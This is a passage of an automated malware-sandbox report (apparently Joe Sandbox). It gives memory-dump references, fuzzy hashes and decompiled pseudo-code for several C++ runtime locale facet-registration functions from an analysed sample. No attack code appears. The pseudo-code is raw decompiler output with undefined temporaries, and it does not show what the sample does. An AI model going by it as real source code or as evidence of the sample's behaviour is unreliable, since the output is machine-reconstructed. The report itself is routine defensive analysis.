                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: Maklocstr$Maklocchr
                          • String ID:
                          • API String ID: 2020259771-0
                          • Opcode ID: c56b363ca36bcbb50e91c2e2ac19d3289f8cdbaad57dca6ddf32d3d047b481d6
                          • Instruction ID: 27c18c0122f2de82fcd23a61c56bf58091a57b6747e6ba9cec2a0110184047da
                          • Opcode Fuzzy Hash: c56b363ca36bcbb50e91c2e2ac19d3289f8cdbaad57dca6ddf32d3d047b481d6
                          • Instruction Fuzzy Hash: 5311C1B16407457BE720EBE8C884F12B7ECFF05228F040909F249CB640DA74F864C7A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 71%
                          			E0132B008(void* __edx, void* __eflags, void* __fp0) {
                          				signed int _t107;
                          				void* _t189;
                          				signed int _t276;
                          				signed int _t303;
                          				signed int _t304;
                          				signed int _t305;
                          				signed int _t306;
                          				signed int _t307;
                          				signed int _t308;
                          				signed int _t309;
                          				signed int _t310;
                          				signed int _t311;
                          				signed int _t312;
                          				signed int _t313;
                          				signed int _t314;
                          				signed int _t315;
                          				signed int _t316;
                          				signed int _t317;
                          				signed int _t318;
                          				void* _t327;
                          
                          				_t331 = __fp0;
                          				_push(8);
                          				E0132F1B6(0x1368615, __eflags);
                          				E013177B6(_t327 - 0x14, 0);
                          				_t310 =  *0x13aaaa0; // 0x0
                          				 *(_t327 - 4) =  *(_t327 - 4) & 0x00000000;
                          				 *(_t327 - 0x10) = _t310;
                          				_t107 = E012F9A10( *((intOrPtr*)(_t327 + 8)), E012F9850(0x13aaa80));
                          				_t302 = _t107;
                          				if(_t107 != 0) {
                          					L5:
                          					E0131780E(_t327 - 0x14);
                          					return E0132F190(_t302, _t330);
                          				} else {
                          					_t330 = _t310;
                          					if(_t310 == 0) {
                          						_push( *((intOrPtr*)(_t327 + 8)));
                          						_push(_t327 - 0x10);
                          						__eflags = E0132B5B7(__edx, _t310, __eflags, __fp0) - 0xffffffff;
                          						if(__eflags == 0) {
                          							E012F9060();
                          							asm("int3");
                          							_push(8);
                          							E0132F1B6(0x1368615, __eflags);
                          							E013177B6(_t327 - 0x14, 0);
                          							_t311 =  *0x13aaaa4; // 0x0
                          							 *(_t327 - 4) =  *(_t327 - 4) & 0x00000000;
                          							 *(_t327 - 0x10) = _t311;
                          							_t303 = E012F9A10( *((intOrPtr*)(_t327 + 8)), E012F9850(0x13aaa84));
                          							__eflags = _t303;
                          							if(_t303 != 0) {
                          								L12:
                          								E0131780E(_t327 - 0x14);
                          								return E0132F190(_t303, __eflags);
                          							} else {
                          								__eflags = _t311;
                          								if(__eflags == 0) {
                          									_push( *((intOrPtr*)(_t327 + 8)));
                          									_push(_t327 - 0x10);
                          									__eflags = E0132B659(_t311, __eflags) - 0xffffffff;
                          									if(__eflags == 0) {
                          										E012F9060();
                          										asm("int3");
                          										_push(8);
                          										E0132F1B6(0x1368615, __eflags);
                          										E013177B6(_t327 - 0x14, 0);
                          										_t312 =  *0x13aaaa8; // 0x0
                          										 *(_t327 - 4) =  *(_t327 - 4) & 0x00000000;
                          										 *(_t327 - 0x10) = _t312;
                          										_t304 = E012F9A10( *((intOrPtr*)(_t327 + 8)), E012F9850(0x13aaa88));
                          										__eflags = _t304;
                          										if(_t304 != 0) {
                          											L19:
                          											E0131780E(_t327 - 0x14);
                          											return E0132F190(_t304, __eflags);
                          										} else {
                          											__eflags = _t312;
                          											if(__eflags == 0) {
                          												_push( *((intOrPtr*)(_t327 + 8)));
                          												_push(_t327 - 0x10);
                          												__eflags = E0132B6C1(_t312, __eflags) - 0xffffffff;
                          												if(__eflags == 0) {
                          													E012F9060();
                          													asm("int3");
                          													_push(8);
                          													E0132F1B6(0x1368615, __eflags);
                          													E013177B6(_t327 - 0x14, 0);
                          													_t313 =  *0x13aaaac; // 0x0
                          													 *(_t327 - 4) =  *(_t327 - 4) & 0x00000000;
                          													 *(_t327 - 0x10) = _t313;
                          													_t305 = E012F9A10( *((intOrPtr*)(_t327 + 8)), E012F9850(0x13aaa8c));
                          													__eflags = _t305;
                          													if(_t305 != 0) {
                          														L26:
                          														E0131780E(_t327 - 0x14);
                          														return E0132F190(_t305, __eflags);
                          													} else {
                          														__eflags = _t313;
                          														if(__eflags == 0) {
                          															_push( *((intOrPtr*)(_t327 + 8)));
                          															_push(_t327 - 0x10);
                          															__eflags = E0132B729(_t313, __eflags) - 0xffffffff;
                          															if(__eflags == 0) {
                          																E012F9060();
                          																asm("int3");
                          																_push(8);
                          																E0132F1B6(0x1368615, __eflags);
                          																E013177B6(_t327 - 0x14, 0);
                          																_t314 =  *0x13aaab4; // 0x0
                          																 *(_t327 - 4) =  *(_t327 - 4) & 0x00000000;
                          																 *(_t327 - 0x10) = _t314;
                          																_t306 = E012F9A10( *((intOrPtr*)(_t327 + 8)), E012F9850(0x13aaa94));
                          																__eflags = _t306;
                          																if(_t306 != 0) {
                          																	L33:
                          																	E0131780E(_t327 - 0x14);
                          																	return E0132F190(_t306, __eflags);
                          																} else {
                          																	__eflags = _t314;
                          																	if(__eflags == 0) {
                          																		_push( *((intOrPtr*)(_t327 + 8)));
                          																		_push(_t327 - 0x10);
                          																		__eflags = E0132B791(_t314, __eflags, __fp0) - 0xffffffff;
                          																		if(__eflags == 0) {
                          																			E012F9060();
                          																			asm("int3");
                          																			_push(8);
                          																			E0132F1B6(0x1368615, __eflags);
                          																			E013177B6(_t327 - 0x14, 0);
                          																			_t315 =  *0x13aaab0; // 0x0
                          																			 *(_t327 - 4) =  *(_t327 - 4) & 0x00000000;
                          																			 *(_t327 - 0x10) = _t315;
                          																			_t307 = E012F9A10( *((intOrPtr*)(_t327 + 8)), E012F9850(0x13aaa90));
                          																			__eflags = _t307;
                          																			if(_t307 != 0) {
                          																				L40:
                          																				E0131780E(_t327 - 0x14);
                          																				return E0132F190(_t307, __eflags);
                          																			} else {
                          																				__eflags = _t315;
                          																				if(__eflags == 0) {
                          																					_push( *((intOrPtr*)(_t327 + 8)));
                          																					_push(_t327 - 0x10);
                          																					__eflags = E0132B815(_t315, __eflags, __fp0) - 0xffffffff;
                          																					if(__eflags == 0) {
                          																						E012F9060();
                          																						asm("int3");
                          																						_push(8);
                          																						E0132F1B6(0x1368615, __eflags);
                          																						E013177B6(_t327 - 0x14, 0);
                          																						_t316 =  *0x13aaab8; // 0x0
                          																						 *(_t327 - 4) =  *(_t327 - 4) & 0x00000000;
                          																						 *(_t327 - 0x10) = _t316;
                          																						_t308 = E012F9A10( *((intOrPtr*)(_t327 + 8)), E012F9850(0x13aaa98));
                          																						__eflags = _t308;
                          																						if(_t308 != 0) {
                          																							L47:
                          																							E0131780E(_t327 - 0x14);
                          																							return E0132F190(_t308, __eflags);
                          																						} else {
                          																							__eflags = _t316;
                          																							if(__eflags == 0) {
                          																								_push( *((intOrPtr*)(_t327 + 8)));
                          																								_push(_t327 - 0x10);
                          																								__eflags = E0132B89A(__eflags, __fp0) - 0xffffffff;
                          																								if(__eflags == 0) {
                          																									E012F9060();
                          																									asm("int3");
                          																									_push(8);
                          																									E0132F1B6(0x1368615, __eflags);
                          																									E013177B6(_t327 - 0x14, 0);
                          																									_t317 =  *0x13aaabc; // 0x0
                          																									 *(_t327 - 4) =  *(_t327 - 4) & 0x00000000;
                          																									 *(_t327 - 0x10) = _t317;
                          																									_t309 = E012F9A10( *((intOrPtr*)(_t327 + 8)), E012F9850(0x13aaa9c));
                          																									__eflags = _t309;
                          																									if(_t309 != 0) {
                          																										L54:
                          																										E0131780E(_t327 - 0x14);
                          																										return E0132F190(_t309, __eflags);
                          																									} else {
                          																										__eflags = _t317;
                          																										if(__eflags == 0) {
                          																											_push( *((intOrPtr*)(_t327 + 8)));
                          																											_push(_t327 - 0x10);
                          																											_t189 = E0132B906(__edx, _t317, __eflags);
                          																											_pop(_t276);
                          																											__eflags = _t189 - 0xffffffff;
                          																											if(__eflags == 0) {
                          																												E012F9060();
                          																												asm("int3");
                          																												_push(4);
                          																												E0132F1B6(0x1368ad3, __eflags);
                          																												_t318 = _t276;
                          																												 *(_t327 - 0x10) = _t318;
                          																												 *((intOrPtr*)(_t318 + 4)) =  *((intOrPtr*)(_t327 + 0xc));
                          																												_push( *((intOrPtr*)(_t327 + 8)));
                          																												_t101 = _t327 - 4;
                          																												 *_t101 =  *(_t327 - 4) & 0x00000000;
                          																												__eflags =  *_t101;
                          																												 *_t318 = 0x1376c58;
                          																												E0132C81A(_t276, __edx, __eflags, _t331);
                          																												return E0132F190(_t318, __eflags);
                          																											} else {
                          																												_t309 =  *(_t327 - 0x10);
                          																												 *(_t327 - 0x10) = _t309;
                          																												 *(_t327 - 4) = 1;
                          																												E0131792B(__eflags, _t309);
                          																												 *0x1374358();
                          																												 *((intOrPtr*)( *((intOrPtr*)( *_t309 + 4))))();
                          																												 *0x13aaabc = _t309;
                          																												goto L54;
                          																											}
                          																										} else {
                          																											_t309 = _t317;
                          																											goto L54;
                          																										}
                          																									}
                          																								} else {
                          																									_t308 =  *(_t327 - 0x10);
                          																									 *(_t327 - 0x10) = _t308;
                          																									 *(_t327 - 4) = 1;
                          																									E0131792B(__eflags, _t308);
                          																									 *0x1374358();
                          																									 *((intOrPtr*)( *((intOrPtr*)( *_t308 + 4))))();
                          																									 *0x13aaab8 = _t308;
                          																									goto L47;
                          																								}
                          																							} else {
                          																								_t308 = _t316;
                          																								goto L47;
                          																							}
                          																						}
                          																					} else {
                          																						_t307 =  *(_t327 - 0x10);
                          																						 *(_t327 - 0x10) = _t307;
                          																						 *(_t327 - 4) = 1;
                          																						E0131792B(__eflags, _t307);
                          																						 *0x1374358();
                          																						 *((intOrPtr*)( *((intOrPtr*)( *_t307 + 4))))();
                          																						 *0x13aaab0 = _t307;
                          																						goto L40;
                          																					}
                          																				} else {
                          																					_t307 = _t315;
                          																					goto L40;
                          																				}
                          																			}
                          																		} else {
                          																			_t306 =  *(_t327 - 0x10);
                          																			 *(_t327 - 0x10) = _t306;
                          																			 *(_t327 - 4) = 1;
                          																			E0131792B(__eflags, _t306);
                          																			 *0x1374358();
                          																			 *((intOrPtr*)( *((intOrPtr*)( *_t306 + 4))))();
                          																			 *0x13aaab4 = _t306;
                          																			goto L33;
                          																		}
                          																	} else {
                          																		_t306 = _t314;
                          																		goto L33;
                          																	}
                          																}
                          															} else {
                          																_t305 =  *(_t327 - 0x10);
                          																 *(_t327 - 0x10) = _t305;
                          																 *(_t327 - 4) = 1;
                          																E0131792B(__eflags, _t305);
                          																 *0x1374358();
                          																 *((intOrPtr*)( *((intOrPtr*)( *_t305 + 4))))();
                          																 *0x13aaaac = _t305;
                          																goto L26;
                          															}
                          														} else {
                          															_t305 = _t313;
                          															goto L26;
                          														}
                          													}
                          												} else {
                          													_t304 =  *(_t327 - 0x10);
                          													 *(_t327 - 0x10) = _t304;
                          													 *(_t327 - 4) = 1;
                          													E0131792B(__eflags, _t304);
                          													 *0x1374358();
                          													 *((intOrPtr*)( *((intOrPtr*)( *_t304 + 4))))();
                          													 *0x13aaaa8 = _t304;
                          													goto L19;
                          												}
                          											} else {
                          												_t304 = _t312;
                          												goto L19;
                          											}
                          										}
                          									} else {
                          										_t303 =  *(_t327 - 0x10);
                          										 *(_t327 - 0x10) = _t303;
                          										 *(_t327 - 4) = 1;
                          										E0131792B(__eflags, _t303);
                          										 *0x1374358();
                          										 *((intOrPtr*)( *((intOrPtr*)( *_t303 + 4))))();
                          										 *0x13aaaa4 = _t303;
                          										goto L12;
                          									}
                          								} else {
                          									_t303 = _t311;
                          									goto L12;
                          								}
                          							}
                          						} else {
                          							_t302 =  *(_t327 - 0x10);
                          							 *(_t327 - 0x10) = _t302;
                          							 *(_t327 - 4) = 1;
                          							E0131792B(__eflags, _t302);
                          							 *0x1374358();
                          							 *((intOrPtr*)( *((intOrPtr*)( *_t302 + 4))))();
                          							 *0x13aaaa0 = _t302;
                          							goto L5;
                          						}
                          					} else {
                          						_t302 = _t310;
                          						goto L5;
                          					}
                          				}
                          			}
























                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 0132B019
                            • Part of subcall function 012F9850: std::_Lockit::_Lockit.LIBCPMT ref: 012F986D
                            • Part of subcall function 012F9850: std::_Lockit::~_Lockit.LIBCPMT ref: 012F9889
                          • collate.LIBCPMT ref: 0132B053
                          • std::_Facet_Register.LIBCPMT ref: 0132B06A
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0132B08A
                          • Concurrency::cancel_current_task.LIBCPMT ref: 0132B097
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registercollate
                          • String ID:
                          • API String ID: 3223962878-0
                          • Opcode ID: 54536a74519d51207186fb3826b8b1ce2fa1dbf69b1e28559a9ff78001842858
                          • Instruction ID: 853773e812d96777c2f6a274a72c6e2fd819c5d18d3474b885d7ca5069261be8
                          • Opcode Fuzzy Hash: 54536a74519d51207186fb3826b8b1ce2fa1dbf69b1e28559a9ff78001842858
                          • Instruction Fuzzy Hash: FD01D6369002268FDF16FB68C4046BEBBB9BF54728F644408D52167388CF34AE04CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 71%
                          			E0132B09D(void* __eflags, void* __fp0) {
                          				signed int _t95;
                          				void* _t166;
                          				signed int _t243;
                          				void* _t265;
                          				signed int _t267;
                          				signed int _t268;
                          				signed int _t269;
                          				signed int _t270;
                          				signed int _t271;
                          				signed int _t272;
                          				signed int _t273;
                          				signed int _t274;
                          				signed int _t275;
                          				signed int _t276;
                          				signed int _t277;
                          				signed int _t278;
                          				signed int _t279;
                          				signed int _t280;
                          				void* _t288;
                          
                          				_t292 = __fp0;
                          				_push(8);
                          				E0132F1B6(0x1368615, __eflags);
                          				E013177B6(_t288 - 0x14, 0);
                          				_t273 =  *0x13aaaa4; // 0x0
                          				 *(_t288 - 4) =  *(_t288 - 4) & 0x00000000;
                          				 *(_t288 - 0x10) = _t273;
                          				_t95 = E012F9A10( *((intOrPtr*)(_t288 + 8)), E012F9850(0x13aaa84));
                          				_t266 = _t95;
                          				if(_t95 != 0) {
                          					L5:
                          					E0131780E(_t288 - 0x14);
                          					return E0132F190(_t266, _t291);
                          				} else {
                          					_t291 = _t273;
                          					if(_t273 == 0) {
                          						_push( *((intOrPtr*)(_t288 + 8)));
                          						_push(_t288 - 0x10);
                          						__eflags = E0132B659(_t273, __eflags) - 0xffffffff;
                          						if(__eflags == 0) {
                          							E012F9060();
                          							asm("int3");
                          							_push(8);
                          							E0132F1B6(0x1368615, __eflags);
                          							E013177B6(_t288 - 0x14, 0);
                          							_t274 =  *0x13aaaa8; // 0x0
                          							 *(_t288 - 4) =  *(_t288 - 4) & 0x00000000;
                          							 *(_t288 - 0x10) = _t274;
                          							_t267 = E012F9A10( *((intOrPtr*)(_t288 + 8)), E012F9850(0x13aaa88));
                          							__eflags = _t267;
                          							if(_t267 != 0) {
                          								L12:
                          								E0131780E(_t288 - 0x14);
                          								return E0132F190(_t267, __eflags);
                          							} else {
                          								__eflags = _t274;
                          								if(__eflags == 0) {
                          									_push( *((intOrPtr*)(_t288 + 8)));
                          									_push(_t288 - 0x10);
                          									__eflags = E0132B6C1(_t274, __eflags) - 0xffffffff;
                          									if(__eflags == 0) {
                          										E012F9060();
                          										asm("int3");
                          										_push(8);
                          										E0132F1B6(0x1368615, __eflags);
                          										E013177B6(_t288 - 0x14, 0);
                          										_t275 =  *0x13aaaac; // 0x0
                          										 *(_t288 - 4) =  *(_t288 - 4) & 0x00000000;
                          										 *(_t288 - 0x10) = _t275;
                          										_t268 = E012F9A10( *((intOrPtr*)(_t288 + 8)), E012F9850(0x13aaa8c));
                          										__eflags = _t268;
                          										if(_t268 != 0) {
                          											L19:
                          											E0131780E(_t288 - 0x14);
                          											return E0132F190(_t268, __eflags);
                          										} else {
                          											__eflags = _t275;
                          											if(__eflags == 0) {
                          												_push( *((intOrPtr*)(_t288 + 8)));
                          												_push(_t288 - 0x10);
                          												__eflags = E0132B729(_t275, __eflags) - 0xffffffff;
                          												if(__eflags == 0) {
                          													E012F9060();
                          													asm("int3");
                          													_push(8);
                          													E0132F1B6(0x1368615, __eflags);
                          													E013177B6(_t288 - 0x14, 0);
                          													_t276 =  *0x13aaab4; // 0x0
                          													 *(_t288 - 4) =  *(_t288 - 4) & 0x00000000;
                          													 *(_t288 - 0x10) = _t276;
                          													_t269 = E012F9A10( *((intOrPtr*)(_t288 + 8)), E012F9850(0x13aaa94));
                          													__eflags = _t269;
                          													if(_t269 != 0) {
                          														L26:
                          														E0131780E(_t288 - 0x14);
                          														return E0132F190(_t269, __eflags);
                          													} else {
                          														__eflags = _t276;
                          														if(__eflags == 0) {
                          															_push( *((intOrPtr*)(_t288 + 8)));
                          															_push(_t288 - 0x10);
                          															__eflags = E0132B791(_t276, __eflags, __fp0) - 0xffffffff;
                          															if(__eflags == 0) {
                          																E012F9060();
                          																asm("int3");
                          																_push(8);
                          																E0132F1B6(0x1368615, __eflags);
                          																E013177B6(_t288 - 0x14, 0);
                          																_t277 =  *0x13aaab0; // 0x0
                          																 *(_t288 - 4) =  *(_t288 - 4) & 0x00000000;
                          																 *(_t288 - 0x10) = _t277;
                          																_t270 = E012F9A10( *((intOrPtr*)(_t288 + 8)), E012F9850(0x13aaa90));
                          																__eflags = _t270;
                          																if(_t270 != 0) {
                          																	L33:
                          																	E0131780E(_t288 - 0x14);
                          																	return E0132F190(_t270, __eflags);
                          																} else {
                          																	__eflags = _t277;
                          																	if(__eflags == 0) {
                          																		_push( *((intOrPtr*)(_t288 + 8)));
                          																		_push(_t288 - 0x10);
                          																		__eflags = E0132B815(_t277, __eflags, __fp0) - 0xffffffff;
                          																		if(__eflags == 0) {
                          																			E012F9060();
                          																			asm("int3");
                          																			_push(8);
                          																			E0132F1B6(0x1368615, __eflags);
                          																			E013177B6(_t288 - 0x14, 0);
                          																			_t278 =  *0x13aaab8; // 0x0
                          																			 *(_t288 - 4) =  *(_t288 - 4) & 0x00000000;
                          																			 *(_t288 - 0x10) = _t278;
                          																			_t271 = E012F9A10( *((intOrPtr*)(_t288 + 8)), E012F9850(0x13aaa98));
                          																			__eflags = _t271;
                          																			if(_t271 != 0) {
                          																				L40:
                          																				E0131780E(_t288 - 0x14);
                          																				return E0132F190(_t271, __eflags);
                          																			} else {
                          																				__eflags = _t278;
                          																				if(__eflags == 0) {
                          																					_push( *((intOrPtr*)(_t288 + 8)));
                          																					_push(_t288 - 0x10);
                          																					__eflags = E0132B89A(__eflags, __fp0) - 0xffffffff;
                          																					if(__eflags == 0) {
                          																						E012F9060();
                          																						asm("int3");
                          																						_push(8);
                          																						E0132F1B6(0x1368615, __eflags);
                          																						E013177B6(_t288 - 0x14, 0);
                          																						_t279 =  *0x13aaabc; // 0x0
                          																						 *(_t288 - 4) =  *(_t288 - 4) & 0x00000000;
                          																						 *(_t288 - 0x10) = _t279;
                          																						_t272 = E012F9A10( *((intOrPtr*)(_t288 + 8)), E012F9850(0x13aaa9c));
                          																						__eflags = _t272;
                          																						if(_t272 != 0) {
                          																							L47:
                          																							E0131780E(_t288 - 0x14);
                          																							return E0132F190(_t272, __eflags);
                          																						} else {
                          																							__eflags = _t279;
                          																							if(__eflags == 0) {
                          																								_push( *((intOrPtr*)(_t288 + 8)));
                          																								_push(_t288 - 0x10);
                          																								_t166 = E0132B906(_t265, _t279, __eflags);
                          																								_pop(_t243);
                          																								__eflags = _t166 - 0xffffffff;
                          																								if(__eflags == 0) {
                          																									E012F9060();
                          																									asm("int3");
                          																									_push(4);
                          																									E0132F1B6(0x1368ad3, __eflags);
                          																									_t280 = _t243;
                          																									 *(_t288 - 0x10) = _t280;
                          																									 *((intOrPtr*)(_t280 + 4)) =  *((intOrPtr*)(_t288 + 0xc));
                          																									_push( *((intOrPtr*)(_t288 + 8)));
                          																									_t89 = _t288 - 4;
                          																									 *_t89 =  *(_t288 - 4) & 0x00000000;
                          																									__eflags =  *_t89;
                          																									 *_t280 = 0x1376c58;
                          																									E0132C81A(_t243, _t265, __eflags, _t292);
                          																									return E0132F190(_t280, __eflags);
                          																								} else {
                          																									_t272 =  *(_t288 - 0x10);
                          																									 *(_t288 - 0x10) = _t272;
                          																									 *(_t288 - 4) = 1;
                          																									E0131792B(__eflags, _t272);
                          																									 *0x1374358();
                          																									 *((intOrPtr*)( *((intOrPtr*)( *_t272 + 4))))();
                          																									 *0x13aaabc = _t272;
                          																									goto L47;
                          																								}
                          																							} else {
                          																								_t272 = _t279;
                          																								goto L47;
                          																							}
                          																						}
                          																					} else {
                          																						_t271 =  *(_t288 - 0x10);
                          																						 *(_t288 - 0x10) = _t271;
                          																						 *(_t288 - 4) = 1;
                          																						E0131792B(__eflags, _t271);
                          																						 *0x1374358();
                          																						 *((intOrPtr*)( *((intOrPtr*)( *_t271 + 4))))();
                          																						 *0x13aaab8 = _t271;
                          																						goto L40;
                          																					}
                          																				} else {
                          																					_t271 = _t278;
                          																					goto L40;
                          																				}
                          																			}
                          																		} else {
                          																			_t270 =  *(_t288 - 0x10);
                          																			 *(_t288 - 0x10) = _t270;
                          																			 *(_t288 - 4) = 1;
                          																			E0131792B(__eflags, _t270);
                          																			 *0x1374358();
                          																			 *((intOrPtr*)( *((intOrPtr*)( *_t270 + 4))))();
                          																			 *0x13aaab0 = _t270;
                          																			goto L33;
                          																		}
                          																	} else {
                          																		_t270 = _t277;
                          																		goto L33;
                          																	}
                          																}
                          															} else {
                          																_t269 =  *(_t288 - 0x10);
                          																 *(_t288 - 0x10) = _t269;
                          																 *(_t288 - 4) = 1;
                          																E0131792B(__eflags, _t269);
                          																 *0x1374358();
                          																 *((intOrPtr*)( *((intOrPtr*)( *_t269 + 4))))();
                          																 *0x13aaab4 = _t269;
                          																goto L26;
                          															}
                          														} else {
                          															_t269 = _t276;
                          															goto L26;
                          														}
                          													}
                          												} else {
                          													_t268 =  *(_t288 - 0x10);
                          													 *(_t288 - 0x10) = _t268;
                          													 *(_t288 - 4) = 1;
                          													E0131792B(__eflags, _t268);
                          													 *0x1374358();
                          													 *((intOrPtr*)( *((intOrPtr*)( *_t268 + 4))))();
                          													 *0x13aaaac = _t268;
                          													goto L19;
                          												}
                          											} else {
                          												_t268 = _t275;
                          												goto L19;
                          											}
                          										}
                          									} else {
                          										_t267 =  *(_t288 - 0x10);
                          										 *(_t288 - 0x10) = _t267;
                          										 *(_t288 - 4) = 1;
                          										E0131792B(__eflags, _t267);
                          										 *0x1374358();
                          										 *((intOrPtr*)( *((intOrPtr*)( *_t267 + 4))))();
                          										 *0x13aaaa8 = _t267;
                          										goto L12;
                          									}
                          								} else {
                          									_t267 = _t274;
                          									goto L12;
                          								}
                          							}
                          						} else {
                          							_t266 =  *(_t288 - 0x10);
                          							 *(_t288 - 0x10) = _t266;
                          							 *(_t288 - 4) = 1;
                          							E0131792B(__eflags, _t266);
                          							 *0x1374358();
                          							 *((intOrPtr*)( *((intOrPtr*)( *_t266 + 4))))();
                          							 *0x13aaaa4 = _t266;
                          							goto L5;
                          						}
                          					} else {
                          						_t266 = _t273;
                          						goto L5;
                          					}
                          				}
                          			}























                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 0132B0AE
                            • Part of subcall function 012F9850: std::_Lockit::_Lockit.LIBCPMT ref: 012F986D
                            • Part of subcall function 012F9850: std::_Lockit::~_Lockit.LIBCPMT ref: 012F9889
                          • messages.LIBCPMT ref: 0132B0E8
                          • std::_Facet_Register.LIBCPMT ref: 0132B0FF
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0132B11F
                          • Concurrency::cancel_current_task.LIBCPMT ref: 0132B12C
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermessages
                          • String ID:
                          • API String ID: 4267825564-0
                          • Opcode ID: 4679beaeb03899a71832fe61a2a4d5237868ba2912d3ee2df7c641735aedcf69
                          • Instruction ID: a3f5f5d715d33210288b42519baa19952fa42fd3dbacd38f07ee3e6b72c53aec
                          • Opcode Fuzzy Hash: 4679beaeb03899a71832fe61a2a4d5237868ba2912d3ee2df7c641735aedcf69
                          • Instruction Fuzzy Hash: 5E01D6369101268BDF15FB68C5147BEFBB9AF54728F240008E6116B284CF34A944CB80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 71%
                          			E0132B25C(void* __eflags, void* __fp0) {
                          				signed int _t59;
                          				void* _t97;
                          				signed int _t144;
                          				void* _t157;
                          				signed int _t159;
                          				signed int _t160;
                          				signed int _t161;
                          				signed int _t162;
                          				signed int _t163;
                          				signed int _t164;
                          				signed int _t165;
                          				signed int _t166;
                          				void* _t171;
                          
                          				_t175 = __fp0;
                          				_push(8);
                          				E0132F1B6(0x1368615, __eflags);
                          				E013177B6(_t171 - 0x14, 0);
                          				_t162 =  *0x13aaab4; // 0x0
                          				 *(_t171 - 4) =  *(_t171 - 4) & 0x00000000;
                          				 *(_t171 - 0x10) = _t162;
                          				_t59 = E012F9A10( *((intOrPtr*)(_t171 + 8)), E012F9850(0x13aaa94));
                          				_t158 = _t59;
                          				if(_t59 != 0) {
                          					L5:
                          					E0131780E(_t171 - 0x14);
                          					return E0132F190(_t158, _t174);
                          				} else {
                          					_t174 = _t162;
                          					if(_t162 == 0) {
                          						_push( *((intOrPtr*)(_t171 + 8)));
                          						_push(_t171 - 0x10);
                          						__eflags = E0132B791(_t162, __eflags, __fp0) - 0xffffffff;
                          						if(__eflags == 0) {
                          							E012F9060();
                          							asm("int3");
                          							_push(8);
                          							E0132F1B6(0x1368615, __eflags);
                          							E013177B6(_t171 - 0x14, 0);
                          							_t163 =  *0x13aaab0; // 0x0
                          							 *(_t171 - 4) =  *(_t171 - 4) & 0x00000000;
                          							 *(_t171 - 0x10) = _t163;
                          							_t159 = E012F9A10( *((intOrPtr*)(_t171 + 8)), E012F9850(0x13aaa90));
                          							__eflags = _t159;
                          							if(_t159 != 0) {
                          								L12:
                          								E0131780E(_t171 - 0x14);
                          								return E0132F190(_t159, __eflags);
                          							} else {
                          								__eflags = _t163;
                          								if(__eflags == 0) {
                          									_push( *((intOrPtr*)(_t171 + 8)));
                          									_push(_t171 - 0x10);
                          									__eflags = E0132B815(_t163, __eflags, __fp0) - 0xffffffff;
                          									if(__eflags == 0) {
                          										E012F9060();
                          										asm("int3");
                          										_push(8);
                          										E0132F1B6(0x1368615, __eflags);
                          										E013177B6(_t171 - 0x14, 0);
                          										_t164 =  *0x13aaab8; // 0x0
                          										 *(_t171 - 4) =  *(_t171 - 4) & 0x00000000;
                          										 *(_t171 - 0x10) = _t164;
                          										_t160 = E012F9A10( *((intOrPtr*)(_t171 + 8)), E012F9850(0x13aaa98));
                          										__eflags = _t160;
                          										if(_t160 != 0) {
                          											L19:
                          											E0131780E(_t171 - 0x14);
                          											return E0132F190(_t160, __eflags);
                          										} else {
                          											__eflags = _t164;
                          											if(__eflags == 0) {
                          												_push( *((intOrPtr*)(_t171 + 8)));
                          												_push(_t171 - 0x10);
                          												__eflags = E0132B89A(__eflags, __fp0) - 0xffffffff;
                          												if(__eflags == 0) {
                          													E012F9060();
                          													asm("int3");
                          													_push(8);
                          													E0132F1B6(0x1368615, __eflags);
                          													E013177B6(_t171 - 0x14, 0);
                          													_t165 =  *0x13aaabc; // 0x0
                          													 *(_t171 - 4) =  *(_t171 - 4) & 0x00000000;
                          													 *(_t171 - 0x10) = _t165;
                          													_t161 = E012F9A10( *((intOrPtr*)(_t171 + 8)), E012F9850(0x13aaa9c));
                          													__eflags = _t161;
                          													if(_t161 != 0) {
                          														L26:
                          														E0131780E(_t171 - 0x14);
                          														return E0132F190(_t161, __eflags);
                          													} else {
                          														__eflags = _t165;
